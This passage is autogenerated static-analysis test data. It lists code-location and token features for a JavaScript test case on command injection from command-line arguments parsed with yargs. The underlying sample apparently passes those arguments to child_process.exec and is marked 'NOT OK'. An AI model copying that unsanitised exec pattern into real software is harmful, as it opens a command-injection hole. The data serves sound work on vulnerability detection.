autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | this | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | this | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | 'arguments' object of anonymous function | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | 'arguments' object of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | exceptional return of anonymous function | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | exceptional return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | functio ... OT OK\\n} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | return of anonymous function | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:44:1 | return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:36:9 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:36:9 | args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:36:9 | args | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:36:9 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:36:9 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:39:7 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:39:7 | args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:39:7 | args | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:39:7 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:39:7 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:39:7 | args = ... \\t\\t.argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:39:7 | args = ... \\t\\t.argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:39:7 | args = ... \\t\\t.argv | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:39:7 | args = ... \\t\\t.argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:6:39:7 | args = ... \\t\\t.argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:19 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:19 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:19 | require | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:19 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:19 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:28 | exceptional return of require('yargs') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:28 | exceptional return of require('yargs') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:28 | exceptional return of require('yargs') | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:28 | exceptional return of require('yargs') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:28 | exceptional return of require('yargs') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:28 | require('yargs') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:28 | require('yargs') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:28 | require('yargs') | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:28 | require('yargs') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:28 | require('yargs') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:10 | require ... command | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:10 | require ... command | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:10 | require ... command | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:10 | require ... command | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:10 | require ... command | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:62 | exceptional return of require ... => { }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:62 | exceptional return of require ... => { }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:62 | exceptional return of require ... => { }) | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:62 | exceptional return of require ... => { }) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:62 | exceptional return of require ... => { }) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:62 | require ... => { }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:62 | require ... => { }) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:62 | require ... => { }) | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:62 | require ... => { }) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:62 | require ... => { }) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:9 | require ... .option | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:9 | require ... .option | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:9 | require ... .option | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:9 | require ... .option | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:9 | require ... .option | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:36 | exceptional return of require ... bar" }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:36 | exceptional return of require ... bar" }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:36 | exceptional return of require ... bar" }) | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:36 | exceptional return of require ... bar" }) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:36 | exceptional return of require ... bar" }) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:36 | require ... bar" }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:36 | require ... bar" }) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:36 | require ... bar" }) | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:36 | require ... bar" }) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:36 | require ... bar" }) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:39:7 | require ... \\t\\t.argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:21:36:27 | 'yargs' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:21:36:27 | 'yargs' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:21:36:27 | 'yargs' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:21:36:27 | 'yargs' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:21:36:27 | 'yargs' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:21:36:27 | 'yargs' | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:21:36:27 | 'yargs' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:21:36:27 | 'yargs' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:4:37:10 | command | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:4:37:10 | command | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:4:37:10 | command | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:4:37:10 | command | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:4:37:10 | command | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:12:37:25 | 'serve [port]' | CalleeFlexibleAccessPath | import(!).command | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:12:37:25 | 'serve [port]' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:12:37:25 | 'serve [port]' | calleeImports | yargs | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:12:37:25 | 'serve [port]' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:12:37:25 | 'serve [port]' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:12:37:25 | 'serve [port]' | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:12:37:25 | 'serve [port]' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:12:37:25 | 'serve [port]' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:28:37:45 | 'start the server' | CalleeFlexibleAccessPath | import(!).command | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:28:37:45 | 'start the server' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:28:37:45 | 'start the server' | calleeImports | yargs | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:28:37:45 | 'start the server' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:28:37:45 | 'start the server' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:28:37:45 | 'start the server' | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:28:37:45 | 'start the server' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:28:37:45 | 'start the server' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | 'arguments' object of anonymous function | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | 'arguments' object of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | (yargs) => { } | CalleeFlexibleAccessPath | import(!).command | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | (yargs) => { } | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | (yargs) => { } | calleeImports | yargs | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | (yargs) => { } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | (yargs) => { } | contextSurroundingFunctionParameters | ()\n(yargs) | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | (yargs) => { } | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | (yargs) => { } | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | (yargs) => { } | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | exceptional return of anonymous function | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | exceptional return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | return of anonymous function | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:48:37:61 | return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:49:37:53 | yargs | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:49:37:53 | yargs | contextSurroundingFunctionParameters | ()\n(yargs) | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:49:37:53 | yargs | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:49:37:53 | yargs | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:37:49:37:53 | yargs | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:4:38:9 | option | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:4:38:9 | option | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:4:38:9 | option | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:4:38:9 | option | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:38:4:38:9 | option | fileImports | arg 